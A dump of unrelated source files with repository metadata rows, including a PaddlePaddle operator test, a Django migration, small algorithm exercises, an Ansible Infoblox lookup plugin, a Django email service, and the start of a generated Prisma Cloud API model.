421d09d35a9eb0d59a9fb4ec23cb7ad8804bd30a | 9f2f386a692a6ddeb7670812d1395a0b0009dad9 | /python/paddle/fluid/tests/unittests/test_softmax_mask_fuse_upper_triangle_op.py | a73ebd73e4946caa50030b52544a3c5a35a5c8d2 | [
"Apache-2.0"
] | permissive | sandyhouse/Paddle | 2f866bf1993a036564986e5140e69e77674b8ff5 | 86e0b07fe7ee6442ccda0aa234bd690a3be2cffa | refs/heads/develop | 2023-08-16T22:59:28.165742 | 2022-06-03T05:23:39 | 2022-06-03T05:23:39 | 181,423,712 | 0 | 7 | Apache-2.0 | 2022-08-15T08:46:04 | 2019-04-15T06:15:22 | C++ | UTF-8 | Python | false | false | 4,087 | py | # Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
import paddle.fluid.core as core
from op_test import OpTest
import paddle
import paddle.fluid as fluid
import paddle.incubate as incubate
paddle.enable_static()
def _get_softmax_upper(x, fp16=True):
x_lower = np.tril(x)
masked_x = np.where(x_lower == 0, -10000.0, x_lower).astype("float32")
max_value = np.max(masked_x, axis=-1, keepdims=True)
before_exp = masked_x - max_value
exp = np.exp(before_exp)
exp_sum = np.sum(exp, axis=-1, keepdims=True)
rst = exp / exp_sum
if fp16:
rst = rst.astype("float16")
return rst
# GPU-only: compares the fused op against the NumPy reference in float16.
@unittest.skipIf(not core.is_compiled_with_cuda(),
                 "core is not compiled with CUDA")
class TestSoftmaxMaskFuseOp(OpTest):
    def setUp(self):
        self.op_type = "fused_softmax_mask_upper_triangle"
        x = np.random.random((1, 4, 32, 32)).astype("float16")
        self.inputs = {'X': x}
        # Expected output comes from the NumPy reference implementation.
        rst = _get_softmax_upper(x)
        self.outputs = {'Out': rst}

    def test_check_output(self):
        self.check_output_with_place(core.CUDAPlace(0))

    def test_check_grad(self):
        self.check_grad_with_place(core.CUDAPlace(0), ["X"], "Out")
# Float64-input variant executed on CPU; the fused op may not provide a CPU
# kernel, so NotImplementedError is tolerated.
@unittest.skipIf(not core.is_compiled_with_cuda(),
                 "core is not compiled with CUDA")
class TestSoftmaxMaskFuseOp1(OpTest):
    def setUp(self):
        self.op_type = "fused_softmax_mask_upper_triangle"
        x = np.random.random((1, 4, 32, 32))
        self.inputs = {'X': x}
        # Expected output comes from the NumPy reference implementation.
        rst = _get_softmax_upper(x)
        self.outputs = {'Out': rst}

    def test_check_output(self):
        try:
            self.check_output_with_place(core.CPUPlace())
        except NotImplementedError:
            pass

    def test_check_grad(self):
        try:
            self.check_grad_with_place(core.CPUPlace(), ["X"], "Out")
        except NotImplementedError:
            pass
@unittest.skipIf(not core.is_compiled_with_cuda(),
                 "core is not compiled with CUDA")
class TestDropoutBiasFuseOp2(unittest.TestCase):
    # test the python side API for softmax_mask_fuse op
    def setUp(self):
        np.random.seed(123)
        self.dtypes = ['float16', 'float32']

    def test_static(self):
        # Static-graph path: build the program, run it on GPU, and compare
        # against the NumPy reference for both dtypes.
        for dtype in self.dtypes:
            with fluid.program_guard(fluid.Program(), fluid.Program()):
                input_x = fluid.data(
                    name="x", shape=[1, 4, 32, 32], dtype=dtype)
                rst = incubate.softmax_mask_fuse_upper_triangle(input_x)

                x_in_np = np.random.random((1, 4, 32, 32)).astype(dtype)
                rst_np = _get_softmax_upper(x_in_np, dtype == 'float16')

                exe = fluid.Executor(fluid.CUDAPlace(0))
                fetches = exe.run(fluid.default_main_program(),
                                  feed={"x": x_in_np},
                                  fetch_list=[rst])
                self.assertTrue(np.allclose(fetches[0], rst_np))

    def test_dygraph(self):
        # Eager (dygraph) path: same comparison without building a program.
        for dtype in self.dtypes:
            with fluid.dygraph.guard(fluid.CUDAPlace(0)):
                x_in_np = np.random.random((1, 4, 32, 32)).astype(dtype)
                rst_np = _get_softmax_upper(x_in_np, dtype == 'float16')
                input_x = fluid.dygraph.to_variable(x_in_np)

                rst = incubate.softmax_mask_fuse_upper_triangle(input_x)
                self.assertTrue(np.allclose(rst, rst_np))
if __name__ == '__main__':
    # Run every test case above when the file is executed directly.
    unittest.main()
| [
"noreply@github.com"
] | sandyhouse.noreply@github.com |
c0a1cc5932507c02c45d2174440b4aa654fad2f9 | f7abecb2826760ce2ce6d022bd2d2225efd5416d | /company/migrations/0002_auto_20180323_1956.py | bab0547c5b00f2cdb63b4bc65d8061f5c712c85f | [] | no_license | vintkor/django_ppf | 2b8e20a016314e6934ccdb2e6723faf7e62a66b4 | 50737517049fdc806ecd3e2fc7757588e7cfcb7b | refs/heads/master | 2022-12-09T12:37:24.508027 | 2020-04-06T20:23:44 | 2020-04-06T20:23:44 | 112,515,920 | 0 | 1 | null | 2022-12-01T22:24:06 | 2017-11-29T19:03:53 | Python | UTF-8 | Python | false | false | 2,982 | py | # Generated by Django 2.0.3 on 2018-03-23 17:56
from django.db import migrations, models
import django.db.models.deletion
import sorl.thumbnail.fields
class Migration(migrations.Migration):
    """Auto-generated schema migration (see the "Generated by Django" header).

    Replaces OfficeGallery with a new Gallery model attached to Office,
    drops Company.logo, and sets localized verbose names on Company and
    Office fields.  Auto-generated code: avoid hand-editing the operations.
    """

    dependencies = [
        ('company', '0001_initial'),
    ]

    operations = [
        migrations.CreateModel(
            name='Gallery',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('created', models.DateTimeField(auto_now_add=True, verbose_name='Дата создания')),
                ('updated', models.DateTimeField(auto_now=True, verbose_name='Дата обновления')),
                ('image', sorl.thumbnail.fields.ImageField(upload_to='images', verbose_name='Изображение')),
                ('alt', models.CharField(blank=True, max_length=255, null=True, verbose_name='SEO Alt')),
            ],
            options={
                'verbose_name': 'Office gallery',
                'verbose_name_plural': 'Office galleries',
            },
        ),
        migrations.RemoveField(
            model_name='officegallery',
            name='office',
        ),
        migrations.AlterModelOptions(
            name='company',
            options={'verbose_name': 'Компания', 'verbose_name_plural': 'Компании'},
        ),
        migrations.AlterModelOptions(
            name='office',
            options={'verbose_name': 'Офис', 'verbose_name_plural': 'Офисы'},
        ),
        migrations.RemoveField(
            model_name='company',
            name='logo',
        ),
        migrations.AlterField(
            model_name='company',
            name='name',
            field=models.CharField(max_length=250, verbose_name='Название компании'),
        ),
        migrations.AlterField(
            model_name='office',
            name='address',
            field=models.CharField(max_length=255, verbose_name='Адрес'),
        ),
        migrations.AlterField(
            model_name='office',
            name='company',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='company.Company', verbose_name='Компания'),
        ),
        migrations.AlterField(
            model_name='office',
            name='coordinates',
            field=models.CharField(max_length=50, verbose_name='Координаты'),
        ),
        migrations.AlterField(
            model_name='office',
            name='region',
            field=models.ForeignKey(on_delete=None, to='geo.Region', verbose_name='Страна'),
        ),
        migrations.DeleteModel(
            name='OfficeGallery',
        ),
        migrations.AddField(
            model_name='gallery',
            name='office',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='company.Office', verbose_name='Офис'),
        ),
    ]
| [
"alkv84@yandex.ru"
] | alkv84@yandex.ru |
69a39a410162d7228cbdda1169b643378eecf6aa | 2be2b1daea464c6b48706c6b2696a94af1b2439b | /lesson7'/4.py | 4eecf7173de71093f181cd7da70d3cf04cf250d1 | [] | no_license | kirigaikabuto/pythonlessons1400 | 584fbef15802accd10b21cd33fbd8aa7900e19f3 | af1df1f4b238e9e4476c75cb25a03f92957bc156 | refs/heads/main | 2023-07-12T19:06:08.117125 | 2021-08-14T08:09:11 | 2021-08-14T08:09:11 | 386,884,757 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 987 | py | s = "Modern Singapore was founded in 1819 by Sir Stamford Raffles as a trading post of the British Empire. In 1867, the colonies in Southeast Asia were reorganised and Singapore came under the direct control of Britain as part of the Straits Settlements. During the Second World War, Singapore was occupied by Japan in 1942, and returned to British control as a separate crown colony following Japan's surrender in 1945. Singapore gained self-governance in 1959 and in 1963 became part of the new federation of Malaysia, alongside Malaya, North Borneo, and Sarawak. Ideological differences led to Singapore being expelled from the federation two years later and it became an independent country."
# Strip sentence punctuation so tokens like "1819," become clean words.
for mark in (",", "."):
    s = s.replace(mark, "")

# Classify every whitespace-separated token of the paragraph.
words = s.split(" ")
alpha = []    # purely alphabetic words
numbers = []  # purely numeric tokens (the years)
others = []   # everything else, e.g. "Japan's" or hyphenated words
for token in words:
    if token.isalpha():
        alpha.append(token)
    elif token.isnumeric():
        numbers.append(token)
    else:
        others.append(token)

print(alpha)
print(numbers)
print(others)
| [
"tleugazy98@gmail.com"
] | tleugazy98@gmail.com |
f24751a0aa719ae0e2a5030802510b8a72c06f93 | eec1f3a9a31a61b74d8ace96301653bef87c456e | /bigfish/segmentation/test/test_nuc_segmentation.py | cc3fae3d8803440c507226847bda4180aea3ccdf | [
"BSD-3-Clause",
"Python-2.0"
] | permissive | fish-quant/big-fish | 843ca1b4731afce738d6d557249475482a6870ef | e951ea850b18be4be70c5d0a419ba524c3a59ada | refs/heads/master | 2023-08-25T04:19:14.376366 | 2022-04-25T22:51:57 | 2022-04-25T22:51:57 | 162,127,052 | 43 | 22 | BSD-3-Clause | 2023-07-02T23:29:41 | 2018-12-17T12:26:09 | Python | UTF-8 | Python | false | false | 430 | py | # -*- coding: utf-8 -*-
# Author: Arthur Imbert <arthur.imbert.pro@gmail.com>
# License: BSD 3 clause
"""
Unitary tests for bigfish.segmentation.nuc_segmentation module.
"""
# TODO add test for bigfish.segmentation.remove_segmented_nuc
# TODO add test for bigfish.segmentation.unet_3_classes_nuc
# TODO add test for bigfish.segmentation.apply_unet_3_classes
# TODO add test for bigfish.segmentation.from_3_classes_to_instances
| [
"arthur.imbert.pro@gmail.com"
] | arthur.imbert.pro@gmail.com |
61269609d910c84387be9e4eb94204f60e28e97b | 5b6b2018ab45cc4710cc5146040bb917fbce985f | /11_search-range-in-binary-search-tree/search-range-in-binary-search-tree.py | addadc00c229ca4127059cd113b672daa90df11d | [] | no_license | ultimate010/codes_and_notes | 6d7c7d42dcfd84354e6fcb5a2c65c6029353a328 | 30aaa34cb1c840f7cf4e0f1345240ac88b8cb45c | refs/heads/master | 2021-01-11T06:56:11.401869 | 2016-10-30T13:46:39 | 2016-10-30T13:46:39 | 72,351,982 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,062 | py | # coding:utf-8
'''
@Copyright:LintCode
@Author: ultimate010
@Problem: http://www.lintcode.com/problem/search-range-in-binary-search-tree
@Language: Python
@Datetime: 16-06-11 15:21
'''
"""
Definition of TreeNode:
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
"""
class Solution:
    """
    @param root: The root of the binary search tree.
    @param k1 and k2: range k1 to k2.
    @return: Return all keys that k1<=key<=k2 in ascending order.
    """

    def searchRange(self, root, k1, k2):
        """Recursive in-order walk: BST values come out ascending, and
        only those inside [k1, k2] are collected."""
        found = []

        def inorder(node):
            if node is None:
                return
            inorder(node.left)
            if k1 <= node.val <= k2:
                found.append(node.val)
            inorder(node.right)

        inorder(root)
        return found
"ultimate010@gmail.com"
] | ultimate010@gmail.com |
b332387214949ab45f1771f0aae9a5028021c655 | a81d21f98dd558416f8731f001cb8151d8309f4f | /interviewbit/interviewbit/pointers/three_sum_zero.py | cea0a17f6a40485087dbf69d9c3abc66aac3694b | [] | no_license | marquesarthur/programming_problems | 1128c38e65aade27e2435f7987d7ee2b328fda51 | 2f7df25d0d735f726b7012e4aa2417dee50526d9 | refs/heads/master | 2022-01-25T18:19:02.575634 | 2022-01-18T02:07:06 | 2022-01-18T02:07:06 | 32,213,919 | 2 | 0 | null | 2020-10-13T01:29:08 | 2015-03-14T13:44:06 | Python | UTF-8 | Python | false | false | 2,088 | py | class Solution:
def threeSum(self, A):
    """All unique triples from A that sum to zero.

    Classic sort + two-pointer sweep; duplicates are collapsed through a
    set.  Returns a sorted list of ascending tuples.
    """
    nums = sorted(A)
    size = len(nums)
    triples = set()
    for first in range(size):
        lo, hi = first + 1, size - 1
        while lo < hi:
            total = nums[first] + nums[lo] + nums[hi]
            if total < 0:
                lo += 1
            elif total > 0:
                hi -= 1
            else:
                triples.add((nums[first], nums[lo], nums[hi]))
                lo += 1
    return sorted(triples)
# Exceeds time limit but does the job
class MatrixSolution:
    def binarySearch(self, A, x):
        """Standard binary search: index of x in sorted list A, or -1."""
        begin = 0
        end = len(A) - 1
        while begin <= end:
            mid = int(begin + (end - begin) / 2)
            if A[mid] == x:
                return mid
            elif A[mid] > x:
                end = mid - 1
            else:
                begin = mid + 1
        return -1

    # @param A : list of integers
    # @return a list of list of integers
    def threeSum(self, A):
        """Zero-sum triples via a precomputed matrix of pair complements.

        B[i][j] holds -(A[i] + A[j]); a triple exists when that value can
        be found among the remaining elements.  O(n^2 log n) plus a linear
        duplicate scan per hit, hence the time-limit note above.
        """
        A = sorted(A)
        S = list(A)
        n = len(A)
        B = [None] * len(A)
        for i in range(len(A)):
            B[i] = [None] * n
            for j in range(i + 1, len(A)):
                k = A[i] + A[j]
                B[i][j] = -k
        result = []
        for i in range(n):
            for j in range(i + 1, n):
                x = B[i][j]
                # Candidates: every element except positions i and j.
                # NOTE(review): A holds ints after sorted(A), so the
                # `A[a] is not None` guards below look vestigial — confirm.
                s_aux = [x for a, x in enumerate(A) if a != i and a != j and A[a] is not None]
                k = self.binarySearch(s_aux, x)
                if k != -1 and A[i] is not None and A[j] is not None:
                    # Re-locate the complement in the full list S to fetch
                    # its value.
                    # NOTE(review): this second search may land on index i
                    # or j itself when values repeat — verify correctness
                    # for inputs with duplicates.
                    k = self.binarySearch(S, x)
                    aux = sorted([A[i], A[j], S[k]])
                    # Linear de-duplication against triples found so far.
                    exists = False
                    for r in result:
                        if r[0] == aux[0] and r[1] == aux[1] and r[2] == aux[2]:
                            exists = True
                            break
                    if not exists:
                        result.append(aux)
        ret = [(r[0], r[1], r[2]) for r in result]
        return ret
| [
"marques.art@gmail.com"
] | marques.art@gmail.com |
6358884396388c3ab81261921c2983e5f5ede5ab | 6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4 | /jSjjhzRg5MvTRPabx_10.py | 329a38580f7189f6c5c3fc07a47ac0fbdc5fc1a3 | [] | no_license | daniel-reich/ubiquitous-fiesta | 26e80f0082f8589e51d359ce7953117a3da7d38c | 9af2700dbe59284f5697e612491499841a6c126f | refs/heads/master | 2023-04-05T06:40:37.328213 | 2021-04-06T20:17:44 | 2021-04-06T20:17:44 | 355,318,759 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,966 | py |
def sentence(words):
result = []
if len(words) == 1:
if words[0][0].lower() in "aeiou":
result.append("An " + words[0].lower() + '.')
else:
result.append("A " + words[0].lower() + ".")
elif len(words) == 2:
if words[0][0].lower() in "aeiou" and words[1][0].lower() in "aeiou":
result.append("An " + words[0].lower() + " and an " + words[1].lower() + '.')
elif words[0][0].lower() in "aeiou" and words[1][0].lower() not in "aeiou":
result.append("An " + words[0].lower() + " and a " + words[1].lower() + '.')
elif words[0][0].lower() not in "aeiou" and words[1][0].lower() in "aeiou":
result.append("A " + words[0].lower() + " and an " + words[1].lower() + '.')
else:
result.append("A " + words[0].lower() + " and a " + words[1].lower() + '.')
else:
for i in range(0, len(words) - 2):
if i == 0:
if words[i][0].lower() in "aeiou":
result.append("An " + words[i].lower())
else:
result.append("A " + words[i].lower())
else:
if words[i][0].lower() in "aeiou":
result.append("an " + words[i].lower())
else:
result.append("a " + words[i].lower())
if words[-2][0].lower() in "aeiou" and words[-1][0].lower() in "aeiou":
result.append("an " + words[-2].lower() + " and an " + words[-1] + ".")
elif words[-2][0].lower() in "aeiou" and words[-1][0].lower() not in "aeiou":
result.append("an " + words[-2].lower() + " and a " + words[-1] + ".")
elif words[-2][0].lower() not in "aeiou" and words[-1][0].lower() in "aeiou":
result.append("a " + words[-2].lower() + " and an " + words[-1] + ".")
else:
result.append("a " + words[-2].lower() + " and a " + words[-1] + ".")
return ", ".join(result)
| [
"daniel.reich@danielreichs-MacBook-Pro.local"
] | daniel.reich@danielreichs-MacBook-Pro.local |
ea68d77f4f32d08fb814a0049b8bd29dfa307ca4 | 41a0220bf117124bf281a50396582c0df1e0675f | /Pyrado/scripts/evaluation/trn_argmax_policy_bayrn.py | da89629bf80d4d2cf83de3f2f6b06d59b967a485 | [
"BSD-3-Clause"
] | permissive | jacarvalho/SimuRLacra | c071dfc22d4f2c54a198405e8974d03333c9961d | a6c982862e2ab39a9f65d1c09aa59d9a8b7ac6c5 | refs/heads/master | 2022-11-24T20:08:52.376545 | 2020-08-03T09:01:35 | 2020-08-03T09:01:35 | 276,885,755 | 0 | 0 | BSD-3-Clause | 2020-07-03T11:39:21 | 2020-07-03T11:39:21 | null | UTF-8 | Python | false | false | 2,508 | py | """
Script to get the maximizer of a GP's posterior given saved data from a BayRn experiment
"""
import os.path as osp
import torch as to
from pyrado.algorithms.advantage import GAE
from pyrado.algorithms.bayrn import BayRn
from pyrado.algorithms.cem import CEM
from pyrado.algorithms.nes import NES
from pyrado.algorithms.power import PoWER
from pyrado.algorithms.ppo import PPO, PPO2
from pyrado.logger.experiment import ask_for_experiment
from pyrado.utils.argparser import get_argparser
from pyrado.utils.experiments import load_experiment
from pyrado.utils.math import UnitCubeProjector
if __name__ == '__main__':
    # Parse command line arguments
    args = get_argparser().parse_args()

    # Get the experiment's directory to load from
    ex_dir = ask_for_experiment() if args.ex_dir is None else args.ex_dir

    # Load the environment and the policy
    env_sim, policy, kwout = load_experiment(ex_dir, args)

    # Load the required data saved by the BayRn run: candidate domain
    # parameters, their evaluated returns, and the search-space bounds.
    cands = to.load(osp.join(ex_dir, 'candidates.pt'))
    cands_values = to.load(osp.join(ex_dir, 'candidates_values.pt')).unsqueeze(1)
    bounds = to.load(osp.join(ex_dir, 'bounds.pt'))
    # Maps candidates into the unit cube for GP optimization.
    uc_normalizer = UnitCubeProjector(bounds[0, :], bounds[1, :])

    # Decide on which algorithm to use via the mode argument
    if args.mode == PPO.name:
        critic = GAE(kwout['value_fcn'], **kwout['hparams']['critic'])
        subroutine = PPO(ex_dir, env_sim, policy, critic, **kwout['hparams']['subroutine'])
    elif args.mode == PPO2.name:
        critic = GAE(kwout['value_fcn'], **kwout['hparams']['critic'])
        subroutine = PPO2(ex_dir, env_sim, policy, critic, **kwout['hparams']['subroutine'])
    elif args.mode == CEM.name:
        subroutine = CEM(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
    elif args.mode == NES.name:
        subroutine = NES(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
    elif args.mode == PoWER.name:
        subroutine = PoWER(ex_dir, env_sim, policy, **kwout['hparams']['subroutine'])
    else:
        raise NotImplementedError('Only PPO, PPO2, CEM, NES, and PoWER are implemented so far.')

    if args.warmstart:
        # Warm start: reuse the loaded policy / value function parameters.
        ppi = policy.param_values.data
        vpi = kwout['value_fcn'].param_values.data
    else:
        ppi = None
        vpi = None

    # Train the policy on the most lucrative domain
    BayRn.train_argmax_policy(ex_dir, env_sim, subroutine, num_restarts=500, num_samples=1000,
                              policy_param_init=ppi, valuefcn_param_init=vpi)
| [
"fabio.muratore@famura.net"
] | fabio.muratore@famura.net |
25c89576f82e9202346193c01764c1a192c9cbfd | 2825bf6479e08dfead428ff9f29f28d5c23d953e | /26_2/26_7.py | e9fd86e7707b27199667321125bfa3feba2697cc | [] | no_license | zedaster/ImaevIntensive | bc459187dace7946d8ad75a04e058748134aeac4 | b91760fa23f25ce2d19778781f35416c177ab881 | refs/heads/main | 2023-06-22T00:24:47.039208 | 2021-07-20T10:40:54 | 2021-07-20T10:40:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 248 | py | file = open('26-j2.txt')
# Task 26 (variant 7): read integer samples from '26-j2.txt' (the first
# line is a header and is skipped), then count how many values lie between
# the median and the arithmetic mean, inclusive of both endpoints.
#
# Fix: the original opened the file without ever closing it; a context
# manager closes it deterministically.
with open('26-j2.txt') as source:
    values = sorted(map(int, source.readlines()[1:]))

# Median of the sorted values (upper median for even-length input, as in
# the original) and the arithmetic mean.
medium = values[len(values) // 2]
avg = sum(values) / len(values)

# Count values in the closed interval between the two statistics,
# whichever order they happen to fall in.
count = 0
for val in values:
    if min(medium, avg) <= val <= max(medium, avg):
        count += 1
print(count)
"serzh.kazantseff@gmail.com"
] | serzh.kazantseff@gmail.com |
fe0efe683946a1b5e9c30a52b867324f374e121c | eacff46eda2c6b509449979a16002b96d4645d8e | /Collections-a-installer/community-general-2.4.0/plugins/lookup/nios_next_ip.py | 5b979b8d075f498a8eacf83c572686b3d3b13f96 | [
"MIT",
"GPL-3.0-only",
"GPL-3.0-or-later"
] | permissive | d-amien-b/simple-getwordpress | 5e6d4d15d5f87124ab591e46b63fec552998fdc3 | da90d515a0aa837b633d50db4d91d22b031c04a2 | refs/heads/master | 2023-04-08T22:13:37.347545 | 2021-04-06T09:25:51 | 2021-04-06T09:25:51 | 351,698,069 | 0 | 0 | MIT | 2021-03-31T16:16:45 | 2021-03-26T07:30:00 | HTML | UTF-8 | Python | false | false | 3,580 | py | #
# Copyright 2018 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
DOCUMENTATION = '''
---
author: Unknown (!UNKNOWN)
name: nios_next_ip
short_description: Return the next available IP address for a network
description:
- Uses the Infoblox WAPI API to return the next available IP addresses
for a given network CIDR
requirements:
- infoblox-client
extends_documentation_fragment:
- community.general.nios
options:
_terms:
description: The CIDR network to retrieve the next addresses from
required: True
num:
description: The number of IP addresses to return
required: false
default: 1
exclude:
description: List of IP's that need to be excluded from returned IP addresses
required: false
'''
EXAMPLES = """
- name: return next available IP address for network 192.168.10.0/24
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
- name: return the next 3 available IP addresses for network 192.168.10.0/24
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', num=3, provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
- name: return the next 3 available IP addresses for network 192.168.10.0/24 excluding ip addresses - ['192.168.10.1', '192.168.10.2']
ansible.builtin.set_fact:
ipaddr: "{{ lookup('community.general.nios_next_ip', '192.168.10.0/24', num=3, exclude=['192.168.10.1', '192.168.10.2'],
provider={'host': 'nios01', 'username': 'admin', 'password': 'password'}) }}"
"""
RETURN = """
_list:
description:
- The list of next IP addresses available
type: list
"""
from ansible.plugins.lookup import LookupBase
from ansible_collections.community.general.plugins.module_utils.net_tools.nios.api import WapiLookup
from ansible.module_utils._text import to_text
from ansible.errors import AnsibleError
class LookupModule(LookupBase):
    """Lookup plugin returning the next available IP(s) for a network CIDR."""

    def run(self, terms, variables=None, **kwargs):
        """Resolve the network, then ask Infoblox for the next free IPs.

        ``terms[0]`` must be a CIDR string; ``num`` and ``exclude`` may be
        passed as keyword options. Raises AnsibleError on any failure.
        """
        try:
            cidr = terms[0]
        except IndexError:
            raise AnsibleError('missing argument in the form of A.B.C.D/E')

        provider = kwargs.pop('provider', {})
        wapi = WapiLookup(provider)

        matches = wapi.get_object('network', {'network': cidr})
        if matches is None:
            raise AnsibleError('unable to find network object %s' % cidr)

        count = kwargs.get('num', 1)
        excluded = kwargs.get('exclude', [])

        try:
            network_ref = matches[0]['_ref']
            response = wapi.call_func(
                'next_available_ip', network_ref,
                {'num': count, 'exclude': excluded})
            return [response['ips']]
        except Exception as exc:
            raise AnsibleError(to_text(exc))
| [
"test@burdo.fr"
] | test@burdo.fr |
58178854f14d7de01b5a58abeb950b2d4c6fe2db | 6a61667e176b06ccdef07e84d79b382b2fb491bb | /common/services/email_service.py | 6b2cc57cdf6fc6d96376703f32b4245ec18d1103 | [] | no_license | vsokoltsov/Interview360Server | 333f08f13b33ef88928b3e4b844f60e72ebec809 | 252b0ebd77eefbcc945a0efc3068cc3421f46d5f | refs/heads/master | 2022-12-11T05:38:01.310133 | 2019-03-24T17:47:09 | 2019-03-24T17:47:09 | 95,320,167 | 2 | 3 | null | 2022-12-08T04:54:08 | 2017-06-24T20:09:08 | Python | UTF-8 | Python | false | false | 2,742 | py | from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.core.mail import EmailMultiAlternatives
import os
import ipdb
class EmailService:
    """Outbound e-mail notifications: interviews, invites, password resets."""

    # Fixed From: address used for every message.
    SENDER = 'Anymail Sender <from@example.com>'

    @classmethod
    def send_interview_reminder(cls, user, vacancy, interview):
        """Remind a single user about an upcoming interview."""
        body = render_to_string('interview_reminder.html', {
            'vacancy': vacancy,
            'interview': interview,
        })
        cls._send_default_mail('Upcoming interview notification', body, [user])

    @classmethod
    def send_interview_invintation(cls, users, vacancy, interview):
        """Invite a group of users to an interview."""
        body = render_to_string('interview_invitation.html', {
            'vacancy': vacancy,
            'interview': interview,
        })
        cls._send_default_mail('Interview invintation', body, users)

    @classmethod
    def sent_personal_employee_invite(cls, user, token, company):
        """E-mail a personal invitation to join ``company``.

        NOTE(review): the name looks like a typo for
        ``send_personal_employee_invite``; kept for caller compatibility.
        """
        invite_url = '{}/auth/invite'.format(
            os.environ['DEFAULT_CLIENT_HOST']
        )
        body = render_to_string('company_invite.html', {
            'company': company,
            'link_url': invite_url,
            'token': token,
        })
        cls._send_default_mail("Company invite mail", body, [user])

    @classmethod
    def send_reset_password_mail(cls, user, token):
        """Send a password-reset link carrying ``token``."""
        reset_url = '{}/auth/reset-password'.format(
            os.environ['DEFAULT_CLIENT_HOST'])
        body = render_to_string('reset_password.html', {
            'reset_link_url': reset_url,
            'token': token,
        })
        cls._send_default_mail('Reset password', body, [user])

    @classmethod
    def send_company_invite_confirmation(cls, user, company):
        """Confirm that an invitation into ``company`` was accepted."""
        company_url = '{}/companies/{}/'.format(
            os.environ['DEFAULT_CLIENT_HOST'], company.id
        )
        body = render_to_string('company_invite_final.html', {
            'link_url': company_url,
            'user': user,
            'company': company,
        })
        cls._send_default_mail('Invite confirmation', body, [user])

    @classmethod
    def _send_default_mail(cls, topic, message, mails):
        """Dispatch ``message`` to ``mails`` from the fixed SENDER address."""
        send_mail(topic, message, cls.SENDER, mails)
| [
"vforvad@gmail.com"
] | vforvad@gmail.com |
a6c0a838c9d08cc5d940f86faa2809284d203636 | e3b9e8ec177e2b4c8bf24bbfefd7b2af4cd51e80 | /search/InitializationError.py | 339256d08a540446ba7de3e7f3b6b667392675c7 | [] | no_license | dmitriyVasilievich1986/radius-logs-parser | cae3ea7aade9ddcdd3b8739e8048a80ee8134d7c | f4d4256dee0c772b06d57acf49e72e742d56996e | refs/heads/main | 2023-06-02T23:26:09.001345 | 2021-06-25T13:00:05 | 2021-06-25T13:00:05 | 379,828,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from .Config import V3
class InitializationError(Exception):
    """Raised when the search component fails to initialise."""

    def __init__(self, *args, **kwargs):
        if V3:
            super().__init__(*args, **kwargs)
        else:
            # Python 2 fallback. The two-argument super() must name *this*
            # class: the original `super(Exception, self)` started the MRO
            # lookup *past* Exception (at BaseException) and only worked by
            # accident.
            super(InitializationError, self).__init__(*args, **kwargs)
"dmitriyvasil@gmail.com"
] | dmitriyvasil@gmail.com |
c667278cf860aef9d54dc6dc40e0ec577a621cbe | 21e7753732296bfdfb6dd9a9b58c7c6b8d90a1e5 | /Hard/longestIncreasingSeq/longestIncreasingSeq_test.py | acf4794919c97abea3326458e44a4ef4dad62e8c | [] | no_license | rongfeng-china/python-algorithms-and-data-structures | eb8514b44d7ff97dd7c4deda2d8ea888a5aa8d04 | a69241bb7b684bc7d00acdd46c2fc214f7b61887 | refs/heads/master | 2020-03-13T09:08:13.375870 | 2015-12-11T07:37:30 | 2015-12-11T07:37:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 188 | py | from longestIncreasingSeq import longestIncreasingSeq
import pytest
def test_longestIncreasingSeq():
    # The wrap-around input [13, 14, 10, 11, 12] contains a strictly
    # increasing run of length three starting at 10.
    sequence = [13, 14, 10, 11, 12]
    assert longestIncreasingSeq(sequence) == [10, 11, 12]
| [
"prathamt@outlook.com"
] | prathamt@outlook.com |
b375d115741069c717a9c061d18b42d1de4fda00 | 70bee1e4e770398ae7ad9323bd9ea06f279e2796 | /openapi_client/models/waas_network_controls.py | 3099374b53195c2dcd56ab82bfaefc1258838d85 | [] | no_license | hi-artem/twistlock-py | c84b420b1e582b3c4cf3631eb72dac6d659d4746 | 9888e905f5b9d3cc00f9b84244588c0992f8e4f4 | refs/heads/main | 2023-07-18T07:57:57.705014 | 2021-08-22T04:36:33 | 2021-08-22T04:36:33 | 398,637,698 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,756 | py | # coding: utf-8
"""
Prisma Cloud Compute API
No description provided (generated by Openapi Generator https://github.com/openapitools/openapi-generator) # noqa: E501
